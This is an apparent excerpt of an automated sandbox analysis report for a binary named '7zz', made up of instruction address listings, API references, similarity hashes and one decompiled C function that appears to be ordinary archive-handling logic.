                                                                                  0x0043292c
                                                                                  0x00432933
                                                                                  0x00432933
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00432846
                                                                                  0x00432846
                                                                                  0x0043284c
                                                                                  0x0043284f
                                                                                  0x00432853
                                                                                  0x0043286c
                                                                                  0x0043286e
                                                                                  0x00432871
                                                                                  0x0043287f
                                                                                  0x00432888
                                                                                  0x00000000
                                                                                  0x00432888
                                                                                  0x00432879
                                                                                  0x0043287d
                                                                                  0x0043287d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0043287d
                                                                                  0x00432855
                                                                                  0x00432859
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0043285b
                                                                                  0x0043285f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0043288d
                                                                                  0x0043288d
                                                                                  0x00432893
                                                                                  0x00432893
                                                                                  0x00000000
                                                                                  0x00432846
                                                                                  0x00432331
                                                                                  0x0043233b
                                                                                  0x0043233f
                                                                                  0x00432347
                                                                                  0x0043234b
                                                                                  0x00432356
                                                                                  0x0043235a
                                                                                  0x0043235f
                                                                                  0x00432361
                                                                                  0x00432365
                                                                                  0x0043236a
                                                                                  0x0043236a
                                                                                  0x0043236d
                                                                                  0x00000000
                                                                                  0x0043236d
                                                                                  0x00431870
                                                                                  0x0043187a
                                                                                  0x0043187e
                                                                                  0x00431886
                                                                                  0x0043188a
                                                                                  0x00431895
                                                                                  0x00431899
                                                                                  0x0043189e
                                                                                  0x004318a0
                                                                                  0x004318a4
                                                                                  0x004318a9
                                                                                  0x004318a9
                                                                                  0x004318ac
                                                                                  0x00000000
                                                                                  0x004318ac
                                                                                  0x0043181d
                                                                                  0x00431827
                                                                                  0x0043182b
                                                                                  0x00431833
                                                                                  0x00431837
                                                                                  0x00431842
                                                                                  0x00431846
                                                                                  0x0043184b
                                                                                  0x0043184d
                                                                                  0x00431851
                                                                                  0x00431856
                                                                                  0x00431856
                                                                                  0x00431859
                                                                                  0x00000000
                                                                                  0x00431859
                                                                                  0x004316dd
                                                                                  0x004316e4
                                                                                  0x004316e7
                                                                                  0x004316ea
                                                                                  0x004316ec
                                                                                  0x004316f0
                                                                                  0x0043170c
                                                                                  0x0043170c
                                                                                  0x004316f2
                                                                                  0x004316f2
                                                                                  0x004316f8
                                                                                  0x004316fc
                                                                                  0x004316ff
                                                                                  0x00431704
                                                                                  0x00431704
                                                                                  0x00431715
                                                                                  0x00431719
                                                                                  0x0043171f
                                                                                  0x00431727
                                                                                  0x00431729
                                                                                  0x0043172d
                                                                                  0x00431740
                                                                                  0x00431743
                                                                                  0x00431745
                                                                                  0x0043178d
                                                                                  0x00431793
                                                                                  0x00431798
                                                                                  0x0043179c
                                                                                  0x0043179f
                                                                                  0x004317a1
                                                                                  0x004317a4
                                                                                  0x004317a7
                                                                                  0x004317f3
                                                                                  0x004317f6
                                                                                  0x004317fb
                                                                                  0x00431802
                                                                                  0x00000000
                                                                                  0x00431802
                                                                                  0x004317a9
                                                                                  0x004317af
                                                                                  0x004317b9
                                                                                  0x004317bd
                                                                                  0x004317c5
                                                                                  0x004317c9
                                                                                  0x004317d4
                                                                                  0x004317d8
                                                                                  0x004317dd
                                                                                  0x004317df
                                                                                  0x004317e3
                                                                                  0x004317e8
                                                                                  0x004317e8
                                                                                  0x004317eb
                                                                                  0x00000000
                                                                                  0x004317eb
                                                                                  0x00431747
                                                                                  0x00431751
                                                                                  0x00431755
                                                                                  0x0043175d
                                                                                  0x00431761
                                                                                  0x0043176c
                                                                                  0x00431770
                                                                                  0x00431775
                                                                                  0x00431777
                                                                                  0x0043177b
                                                                                  0x00431780
                                                                                  0x00431780
                                                                                  0x00431783
                                                                                  0x00000000
                                                                                  0x0043172f
                                                                                  0x00431732
                                                                                  0x00431736
                                                                                  0x00000000
                                                                                  0x00431736
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0043160a
                                                                                  0x0043160a
                                                                                  0x0043160d
                                                                                  0x00431610
                                                                                  0x00431613
                                                                                  0x00431617
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0043161d
                                                                                  0x00431621
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00431627
                                                                                  0x0043162b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00431634
                                                                                  0x00431634
                                                                                  0x00431637
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0043163d
                                                                                  0x00431641
                                                                                  0x00431645
                                                                                  0x0043169e
                                                                                  0x0043169e
                                                                                  0x004316b5
                                                                                  0x004316ba
                                                                                  0x00000000
                                                                                  0x004316ba
                                                                                  0x00431647
                                                                                  0x0043164a
                                                                                  0x0043164d
                                                                                  0x0043164f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00431651
                                                                                  0x00431653
                                                                                  0x00431657
                                                                                  0x00431657
                                                                                  0x0043165b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0043165d
                                                                                  0x0043165f
                                                                                  0x0043166b
                                                                                  0x0043166b
                                                                                  0x0043166e
                                                                                  0x0043166e
                                                                                  0x00431670
                                                                                  0x00431672
                                                                                  0x0043167b
                                                                                  0x00431682
                                                                                  0x0043168b
                                                                                  0x0043168e
                                                                                  0x00431698
                                                                                  0x0043169d
                                                                                  0x00000000
                                                                                  0x00431670
                                                                                  0x00431662
                                                                                  0x00431662
                                                                                  0x00431667
                                                                                  0x00000000
                                                                                  0x004316bd
                                                                                  0x004316bd
                                                                                  0x004316c3
                                                                                  0x004316c3
                                                                                  0x00000000
                                                                                  0x0043160a
                                                                                  0x004315ef
                                                                                  0x004315f3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00431583
                                                                                  0x0043158e
                                                                                  0x00431590
                                                                                  0x00431592
                                                                                  0x0043264d
                                                                                  0x00432653
                                                                                  0x00432657
                                                                                  0x0043265c
                                                                                  0x0043265e
                                                                                  0x00432662
                                                                                  0x0043266b
                                                                                  0x0043266b
                                                                                  0x00000000
                                                                                  0x00432662
                                                                                  0x00000000
                                                                                  0x00431592
                                                                                  0x00431522
                                                                                  0x00431522
                                                                                  0x00432994
                                                                                  0x00432994
                                                                                  0x0043299e
                                                                                  0x004329a3
                                                                                  0x004329ad
                                                                                  0x004329b2
                                                                                  0x004329b4
                                                                                  0x004329b9
                                                                                  0x004329c2
                                                                                  0x004329c2
                                                                                  0x00431520
                                                                                  0x00431493
                                                                                  0x00431496
                                                                                  0x00431496
                                                                                  0x0043149c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0043149e
                                                                                  0x004314a1
                                                                                  0x004314a4
                                                                                  0x004314a7
                                                                                  0x004314ae
                                                                                  0x004314b6
                                                                                  0x004314b9
                                                                                  0x00000000
                                                                                  0x004314be
                                                                                  0x004314be
                                                                                  0x004314c1
                                                                                  0x004314d0
                                                                                  0x004314d0
                                                                                  0x00000000
                                                                                  0x004314d0
                                                                                  0x004314c3
                                                                                  0x004314ca
                                                                                  0x004314ca
                                                                                  0x004314cd
                                                                                  0x00000000
                                                                                  0x004314cd
                                                                                  0x004314c5
                                                                                  0x004314c8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004314c8
                                                                                  0x004314d2
                                                                                  0x004314d2
                                                                                  0x004314d5
                                                                                  0x004314d8
                                                                                  0x00000000
                                                                                  0x00431496
                                                                                  0x004312d1
                                                                                  0x004312d6
                                                                                  0x004312db
                                                                                  0x004312f0
                                                                                  0x004312f0
                                                                                  0x004312f2
                                                                                  0x004312f7
                                                                                  0x00431315
                                                                                  0x00431318
                                                                                  0x0043131b
                                                                                  0x0043146d
                                                                                  0x00431479
                                                                                  0x0043147e
                                                                                  0x00431481
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00431321
                                                                                  0x00431321
                                                                                  0x00431327
                                                                                  0x0043132c
                                                                                  0x00431337
                                                                                  0x0043133a
                                                                                  0x0043133d
                                                                                  0x00431340
                                                                                  0x00431343
                                                                                  0x00431346
                                                                                  0x00431349
                                                                                  0x0043134f
                                                                                  0x00431355
                                                                                  0x0043135b
                                                                                  0x0043135d
                                                                                  0x00431360
                                                                                  0x00431394
                                                                                  0x00431397
                                                                                  0x0043139d
                                                                                  0x00431362
                                                                                  0x00431365
                                                                                  0x00431365
                                                                                  0x0043136c
                                                                                  0x0043136e
                                                                                  0x00431370
                                                                                  0x00431375
                                                                                  0x00431388
                                                                                  0x0043138b
                                                                                  0x00431391
                                                                                  0x00431391
                                                                                  0x00431375
                                                                                  0x00000000
                                                                                  0x0043136c
                                                                                  0x004313a3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004313ac
                                                                                  0x004313b5
                                                                                  0x004313bb
                                                                                  0x004313c1
                                                                                  0x004313c4
                                                                                  0x004313e4
                                                                                  0x004313e4
                                                                                  0x00000000
                                                                                  0x004313c6
                                                                                  0x004313c9
                                                                                  0x004313cc
                                                                                  0x004313cc
                                                                                  0x004313d4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004313dc
                                                                                  0x004313dd
                                                                                  0x004313e2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004313e2
                                                                                  0x00431430
                                                                                  0x004313e8
                                                                                  0x004313f2
                                                                                  0x004313f5
                                                                                  0x004313fa
                                                                                  0x00431405
                                                                                  0x00431408
                                                                                  0x00431409
                                                                                  0x00431410
                                                                                  0x00431411
                                                                                  0x0043141c
                                                                                  0x00431436
                                                                                  0x00431439
                                                                                  0x0043143c
                                                                                  0x0043143f
                                                                                  0x00431442
                                                                                  0x00431445
                                                                                  0x00431454
                                                                                  0x00431454
                                                                                  0x00431458
                                                                                  0x0043145a
                                                                                  0x0043145a
                                                                                  0x00000000
                                                                                  0x00431458
                                                                                  0x00431447
                                                                                  0x0043144e
                                                                                  0x0043144e
                                                                                  0x00431451
                                                                                  0x00000000
                                                                                  0x00431451
                                                                                  0x00431449
                                                                                  0x0043144c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0043144c
                                                                                  0x00431428
                                                                                  0x0043142b
                                                                                  0x00000000
                                                                                  0x0043142b
                                                                                  0x004313c4
                                                                                  0x0043145e
                                                                                  0x0043145e
                                                                                  0x00431464
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004312f9
                                                                                  0x004312f9
                                                                                  0x004312ff
                                                                                  0x00431304
                                                                                  0x0043130c
                                                                                  0x0043130c
                                                                                  0x0043130f
                                                                                  0x00431310
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004312dd
                                                                                  0x004312dd
                                                                                  0x004312e5
                                                                                  0x004312ea
                                                                                  0x004312eb
                                                                                  0x00000000
                                                                                  0x004312dd

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00431203
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00431802
                                                                                    • Part of subcall function 0040F5DB: __EH_prolog.LIBCMT ref: 0040F5E0
                                                                                    • Part of subcall function 0042B864: __EH_prolog.LIBCMT ref: 0042B869
                                                                                    • Part of subcall function 00428A47: __EH_prolog.LIBCMT ref: 00428A4C
                                                                                    • Part of subcall function 00428510: __EH_prolog.LIBCMT ref: 00428515
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004317A9
                                                                                    • Part of subcall function 0043353F: __EH_prolog.LIBCMT ref: 00433544
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$FreeString
                                                                                  • String ID: )
                                                                                  • API String ID: 397689101-2427484129
                                                                                  • Opcode ID: df01c1d9236870b908461b3370f7b2645975f0d64cdd804e5c176365fc9b52a3
                                                                                  • Instruction ID: 3cd5448d51800a9ea3fb603d1c019fc727f39b37be062062b600306fe1c5b3de
                                                                                  • Opcode Fuzzy Hash: df01c1d9236870b908461b3370f7b2645975f0d64cdd804e5c176365fc9b52a3
                                                                                  • Instruction Fuzzy Hash: 06036C30900259DFDF15DFA5C984BEDBBB0AF18308F14809EE849A7292DB789E85CF55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004285AD Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 379COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 89%
                                                                                  			E004285AD(void* __ecx) {
				signed int _t160;
				intOrPtr _t162;
				signed int _t163;
				signed int _t164;
				signed int _t166;
				intOrPtr _t175;
				void* _t178;
				intOrPtr* _t188;
				signed int _t194;
				signed int _t196;
				intOrPtr* _t199;
				signed int _t202;
				signed int* _t205;
				intOrPtr _t211;
				signed int _t215;
				void* _t225;
				void* _t226;
				signed int _t240;
				signed int _t241;
				void* _t242;
				void* _t243;
				signed int _t244;
				void* _t245;
				intOrPtr _t246;
				signed int _t247;
				signed int _t250;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t258;
				signed int _t274;
				signed int _t276;
				void* _t278;
				signed int _t281;
				signed int _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				void* _t301;
				intOrPtr* _t302;
				signed int _t303;
				signed int _t305;
				void* _t307;
				intOrPtr _t308;
				void* _t309;
				signed int _t310;
				void* _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t315;
				void* _t317;
				void* _t319;

				L0046B890(0x476ae2, _t319);
				_t317 = __ecx;
				_t305 = 0;
				if( *((char*)(__ecx + 0x110)) == 0) {
					_t250 =  *(__ecx + 0x24);
					if(_t250 != 0) {
						__eflags = _t250;
						 *(_t319 - 0x18) = 0;
						 *(_t319 - 0x14) = 0;
						 *(_t319 - 0x10) = 0;
						if(_t250 > 0) {
							do {
								_t303 =  *(_t319 - 0x10);
								__eflags =  *(_t317 + 0x38);
								_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x28)) + _t303 * 4));
								_t314 =  *((intOrPtr*)(_t211 + 0x20));
								_t246 =  *((intOrPtr*)(_t211 + 0x24));
								 *((intOrPtr*)(_t319 - 0x20)) = _t314;
								if( *(_t317 + 0x38) == 0) {
									__eflags = _t303 - _t250 - 1;
									if(__eflags >= 0) {
										_t315 = _t317 + 0x94;
										E00408767(_t315, __eflags, 0);
										_t314 =  *((intOrPtr*)(_t319 - 0x20));
										 *( *(_t315 + 0xc)) =  *(_t319 - 0x14);
									} else {
										L0042389F(_t317 + 0x6c,  *(_t319 - 0x18) + _t246,  *(_t319 - 0x14));
									}
									_t215 = 1;
									__eflags = _t314 - _t215;
									 *(_t319 - 0x1c) = _t215;
									if(_t314 > _t215) {
										do {
											E00415C6D(_t317 + 0x94,  *(_t319 - 0x1c) +  *(_t319 - 0x14));
											 *(_t319 - 0x1c) =  *(_t319 - 0x1c) + 1;
											__eflags =  *(_t319 - 0x1c) - _t314;
										} while ( *(_t319 - 0x1c) < _t314);
									}
								}
								 *(_t319 - 0x18) =  *(_t319 - 0x18) + _t246;
								 *(_t319 - 0x14) =  *(_t319 - 0x14) + _t314;
								L0042389F(_t317 + 0x58, _t246, _t314);
								_t250 =  *(_t317 + 0x24);
								 *(_t319 - 0x10) =  *(_t319 - 0x10) + 1;
								__eflags =  *(_t319 - 0x10) - _t250;
							} while ( *(_t319 - 0x10) < _t250);
							_t305 = 0;
							__eflags = 0;
						}
						_t160 =  *(_t317 + 0x38);
						__eflags = _t160 - _t305;
						if(_t160 != _t305) {
							 *(_t319 - 0x10) =  *(_t319 - 0x10) & 0x00000000;
							__eflags = _t160;
							if(_t160 > 0) {
								_t65 = _t319 - 0x1c;
								 *_t65 =  *(_t319 - 0x1c) & 0x00000000;
								__eflags =  *_t65;
								do {
									_t278 = 0;
									_t205 =  *((intOrPtr*)(_t317 + 0x3c)) +  *(_t319 - 0x1c);
									_t244 =  *_t205;
									__eflags = _t244;
									if(_t244 > 0) {
										_t302 =  *((intOrPtr*)(_t317 + 0x64));
										do {
											_t278 = _t278 +  *_t302;
											_t302 = _t302 + 8;
											_t244 = _t244 - 1;
											__eflags = _t244;
										} while (_t244 != 0);
									}
									_t313 = _t205[2];
									_t301 = _t205[1] + _t278;
									_t245 = 0;
									__eflags = _t313;
									if(_t313 > 0) {
										_t281 =  *((intOrPtr*)(_t317 + 0x64)) + 4;
										__eflags = _t281;
										do {
											_t245 = _t245 +  *_t281;
											_t281 = _t281 + 8;
											_t313 = _t313 - 1;
											__eflags = _t313;
										} while (_t313 != 0);
									}
									L0042389F(_t317 + 0x6c, _t301, _t205[3] + _t245);
									 *(_t319 - 0x10) =  *(_t319 - 0x10) + 1;
									 *(_t319 - 0x1c) =  *(_t319 - 0x1c) + 0x10;
									__eflags =  *(_t319 - 0x10) -  *(_t317 + 0x38);
								} while ( *(_t319 - 0x10) <  *(_t317 + 0x38));
							}
							_t312 = 0;
							__eflags =  *(_t319 - 0x14);
							if( *(_t319 - 0x14) > 0) {
								do {
									_t276 =  *(_t317 + 0x74);
									_t299 = 0;
									__eflags = _t276;
									if(_t276 <= 0) {
										L31:
										_t299 = _t299 | 0xffffffff;
										__eflags = _t299;
									} else {
										_t202 =  *((intOrPtr*)(_t317 + 0x78)) + 4;
										__eflags = _t202;
										while(1) {
											__eflags =  *_t202 - _t312;
											if( *_t202 == _t312) {
												goto L32;
											}
											_t299 = _t299 + 1;
											_t202 = _t202 + 8;
											__eflags = _t299 - _t276;
											if(_t299 < _t276) {
												continue;
											} else {
												goto L31;
											}
											goto L32;
										}
									}
									L32:
									__eflags = _t299 - 0xffffffff;
									if(_t299 == 0xffffffff) {
										E00415C6D(_t317 + 0x94, _t312);
									}
									_t312 = _t312 + 1;
									__eflags = _t312 -  *(_t319 - 0x14);
								} while (_t312 <  *(_t319 - 0x14));
							}
						}
						_t307 = 0;
						__eflags =  *(_t319 - 0x18);
						if( *(_t319 - 0x18) > 0) {
							do {
								_t274 =  *(_t317 + 0x74);
								_t298 = 0;
								__eflags = _t274;
								if(_t274 <= 0) {
									L40:
									_t298 = _t298 | 0xffffffff;
									__eflags = _t298;
								} else {
									_t199 =  *((intOrPtr*)(_t317 + 0x78));
									while(1) {
										__eflags =  *_t199 - _t307;
										if( *_t199 == _t307) {
											goto L41;
										}
										_t298 = _t298 + 1;
										_t199 = _t199 + 8;
										__eflags = _t298 - _t274;
										if(_t298 < _t274) {
											continue;
										} else {
											goto L40;
										}
										goto L41;
									}
								}
								L41:
								__eflags = _t298 - 0xffffffff;
								if(_t298 == 0xffffffff) {
									E00415C6D(_t317 + 0x80, _t307);
								}
								_t307 = _t307 + 1;
								__eflags = _t307 -  *(_t319 - 0x18);
							} while (_t307 <  *(_t319 - 0x18));
						}
						__eflags =  *(_t317 + 0x88);
						if( *(_t317 + 0x88) == 0) {
							 *(_t319 - 0x1c) = 1;
							L0046B8F4(_t319 - 0x1c, 0x47e128);
						}
						_t162 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x8c))));
						while(1) {
							_t163 = E00424159(_t317 + 0x58, _t162, _t319 - 0x1c, _t319 - 0x10);
							_t254 =  *(_t319 - 0x1c);
							_t308 = 0;
							__eflags = _t254;
							if(_t254 <= 0) {
								goto L50;
							}
							_t196 =  *((intOrPtr*)(_t317 + 0x64)) + 4;
							__eflags = _t196;
							do {
								_t308 = _t308 +  *_t196;
								_t196 = _t196 + 8;
								_t254 = _t254 - 1;
								__eflags = _t254;
							} while (_t254 != 0);
							L50:
							_t255 =  *(_t317 + 0x74);
							_t296 = 0;
							__eflags = _t255;
							if(_t255 <= 0) {
								L54:
								_t164 = _t163 | 0xffffffff;
								__eflags = _t164;
							} else {
								_t194 =  *((intOrPtr*)(_t317 + 0x78)) + 4;
								__eflags = _t194;
								while(1) {
									__eflags =  *_t194 - _t308;
									if( *_t194 == _t308) {
										break;
									}
									_t296 = _t296 + 1;
									_t194 = _t194 + 8;
									__eflags = _t296 - _t255;
									if(_t296 < _t255) {
										continue;
									} else {
										goto L54;
									}
									goto L55;
								}
								_t164 = _t296;
							}
							L55:
							__eflags = _t164;
							if(_t164 >= 0) {
								_t162 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x78)) + _t164 * 8));
								continue;
							}
							_t256 =  *(_t317 + 0x9c);
							_t297 = 0;
							__eflags = _t256;
							if(_t256 > 0) {
								_t188 =  *((intOrPtr*)(_t317 + 0xa0));
								while(1) {
									__eflags =  *_t188 - _t308;
									if(__eflags == 0) {
										break;
									}
									_t297 = _t297 + 1;
									_t188 = _t188 + 4;
									__eflags = _t297 - _t256;
									if(_t297 < _t256) {
										continue;
									} else {
									}
									goto L64;
								}
								_t243 = _t317 + 0x94;
								 *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x94)) + 4))(_t297, 1);
								E00408767(_t243, __eflags, 0);
								 *((intOrPtr*)( *((intOrPtr*)(_t243 + 0xc)))) = _t308;
							}
							L64:
							__eflags =  *((char*)(_t317 + 0x48));
							if( *((char*)(_t317 + 0x48)) != 0) {
								_t310 =  *(_t317 + 0x9c);
								_t241 = 0;
								__eflags = _t310;
								 *(_t319 - 0x1c) = _t310;
								if(_t310 > 0) {
									do {
										L0042389F(_t317 + 0x6c,  *(_t319 - 0x18) + _t241,  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0xa0)) + _t241 * 4)));
										_t241 = _t241 + 1;
										__eflags = _t241 - _t310;
									} while (_t241 < _t310);
								}
								E0040862D();
								_t242 = 0;
								__eflags = _t310;
								if(_t310 > 0) {
									 *(_t319 - 0x18) = _t319 - 0x44;
									do {
										E00404AD0(_t319 - 0x44, 4);
										 *(_t319 - 0x44) = 0x47b178;
										 *(_t319 - 0x48) =  *(_t319 - 0x48) & 0x00000000;
										_t175 = 1;
										 *((intOrPtr*)(_t319 - 0x2c)) = _t175;
										 *((intOrPtr*)(_t319 - 0x28)) = _t175;
										 *(_t319 - 4) = 2;
										_push(_t319 - 0x4c);
										 *((intOrPtr*)(_t319 - 0x4c)) = 0x6f10701;
										E00428BB4(_t317 + 0x1c);
										_t178 = 1;
										L0042389F(_t317 + 0x58, _t178, _t178);
										E00415C6D(_t317 + 0x94,  *(_t319 - 0x14) + _t242);
										 *(_t319 - 0x44) = 0x47b178;
										 *(_t319 - 4) = 3;
										E0040862D();
										 *(_t319 - 4) =  *(_t319 - 4) | 0xffffffff;
										E00408604(_t319 - 0x44);
										_t242 = _t242 + 1;
										__eflags = _t242 -  *(_t319 - 0x1c);
									} while (_t242 <  *(_t319 - 0x1c));
								}
							}
							goto L70;
						}
					} else {
						if( *((char*)(__ecx + 0x48)) == 0) {
							 *(_t319 - 0x1c) = 1;
							L0046B8F4(_t319 - 0x1c, 0x47e128);
						}
						if( *(_t317 + 0x38) != _t305) {
							 *(_t319 - 0x1c) = 1;
							L0046B8F4(_t319 - 0x1c, 0x47e128);
						}
						E00428B61(_t319 - 0x6c);
						_t247 = 1;
						_push(_t319 - 0x74);
						 *(_t319 - 4) = _t305;
						 *(_t319 - 0x54) = _t247;
						 *(_t319 - 0x50) = _t247;
						 *((intOrPtr*)(_t319 - 0x74)) = 0x6f10701;
						 *(_t319 - 0x70) = _t305;
						E00428BB4(_t317 + 0x1c);
						_t225 = _t247;
						_push(_t225);
						_t226 = _t247;
						_push(_t226);
						L0042389F(_t317 + 0x58);
						E00415C6D(_t317 + 0x80, _t305);
						E00415C6D(_t317 + 0x94, _t305);
						 *(_t319 - 0x6c) = 0x47b178;
						 *(_t319 - 0x1c) = _t319 - 0x6c;
						 *(_t319 - 4) = _t247;
						E0040862D();
						 *(_t319 - 4) =  *(_t319 - 4) | 0xffffffff;
						E00408604(_t319 - 0x6c);
					}
					L70:
					_t240 =  *(_t317 + 0x24) - 1;
					if(_t240 >= 0) {
						_t309 = _t317 + 0xfc;
						do {
							L0042389F(_t309,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x28)) + _t240 * 4)))),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x28)) + _t240 * 4)) + 4)));
							_t240 = _t240 - 1;
						} while (_t240 >= 0);
					}
					_push(0xa8);
					_t258 = L004079F2();
					 *(_t319 - 0x1c) = _t258;
					_t330 = _t258;
					 *(_t319 - 4) = 4;
					if(_t258 == 0) {
						_t166 = 0;
						__eflags = 0;
					} else {
						_push(_t317 + 0x58);
						_t166 = L004233F8(_t258, _t330);
					}
					 *(_t319 - 4) =  *(_t319 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t317 + 0xf8)) = _t166;
					L00423685(_t166, _t317 + 0xa8);
					 *((char*)(_t317 + 0x110)) = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t319 - 0xc));
				return 0;
			}























































                                                                                  0x004285b2
                                                                                  0x004285bc
                                                                                  0x004285bf
                                                                                  0x004285c8
                                                                                  0x004285ce
                                                                                  0x004285d3
                                                                                  0x00428687
                                                                                  0x00428689
                                                                                  0x0042868c
                                                                                  0x0042868f
                                                                                  0x00428692
                                                                                  0x00428698
                                                                                  0x0042869b
                                                                                  0x0042869e
                                                                                  0x004286a2
                                                                                  0x004286a5
                                                                                  0x004286a8
                                                                                  0x004286ab
                                                                                  0x004286ae
                                                                                  0x004286b1
                                                                                  0x004286b3
                                                                                  0x004286c8
                                                                                  0x004286d2
                                                                                  0x004286dd
                                                                                  0x004286e0
                                                                                  0x004286b5
                                                                                  0x004286c1
                                                                                  0x004286c1
                                                                                  0x004286e4
                                                                                  0x004286e5
                                                                                  0x004286e7
                                                                                  0x004286ea
                                                                                  0x004286ec
                                                                                  0x004286fb
                                                                                  0x00428700
                                                                                  0x00428703
                                                                                  0x00428703
                                                                                  0x004286ec
                                                                                  0x004286ea
                                                                                  0x00428708
                                                                                  0x0042870b
                                                                                  0x00428713
                                                                                  0x00428718
                                                                                  0x0042871b
                                                                                  0x0042871e
                                                                                  0x0042871e
                                                                                  0x00428727
                                                                                  0x00428727
                                                                                  0x00428727
                                                                                  0x00428729
                                                                                  0x0042872c
                                                                                  0x0042872e
                                                                                  0x00428734
                                                                                  0x00428738
                                                                                  0x0042873a
                                                                                  0x0042873c
                                                                                  0x0042873c
                                                                                  0x0042873c
                                                                                  0x00428740
                                                                                  0x00428743
                                                                                  0x00428745
                                                                                  0x00428748
                                                                                  0x0042874a
                                                                                  0x0042874c
                                                                                  0x0042874e
                                                                                  0x00428751
                                                                                  0x00428751
                                                                                  0x00428753
                                                                                  0x00428756
                                                                                  0x00428756
                                                                                  0x00428756
                                                                                  0x00428751
                                                                                  0x0042875c
                                                                                  0x0042875f
                                                                                  0x00428761
                                                                                  0x00428763
                                                                                  0x00428765
                                                                                  0x0042876a
                                                                                  0x0042876a
                                                                                  0x0042876d
                                                                                  0x0042876d
                                                                                  0x0042876f
                                                                                  0x00428772
                                                                                  0x00428772
                                                                                  0x00428772
                                                                                  0x0042876d
                                                                                  0x0042877f
                                                                                  0x00428784
                                                                                  0x0042878a
                                                                                  0x0042878e
                                                                                  0x0042878e
                                                                                  0x00428740
                                                                                  0x00428793
                                                                                  0x00428795
                                                                                  0x00428798
                                                                                  0x0042879a
                                                                                  0x0042879a
                                                                                  0x0042879d
                                                                                  0x0042879f
                                                                                  0x004287a1
                                                                                  0x004287b5
                                                                                  0x004287b5
                                                                                  0x004287b5
                                                                                  0x004287a3
                                                                                  0x004287a6
                                                                                  0x004287a6
                                                                                  0x004287a9
                                                                                  0x004287a9
                                                                                  0x004287ab
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004287ad
                                                                                  0x004287ae
                                                                                  0x004287b1
                                                                                  0x004287b3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004287b3
                                                                                  0x004287a9
                                                                                  0x004287b8
                                                                                  0x004287b8
                                                                                  0x004287bb
                                                                                  0x004287c4
                                                                                  0x004287c4
                                                                                  0x004287c9
                                                                                  0x004287ca
                                                                                  0x004287ca
                                                                                  0x0042879a
                                                                                  0x00428798
                                                                                  0x004287cf
                                                                                  0x004287d1
                                                                                  0x004287d4
                                                                                  0x004287d6
                                                                                  0x004287d6
                                                                                  0x004287d9
                                                                                  0x004287db
                                                                                  0x004287dd
                                                                                  0x004287ee
                                                                                  0x004287ee
                                                                                  0x004287ee
                                                                                  0x004287df
                                                                                  0x004287df
                                                                                  0x004287e2
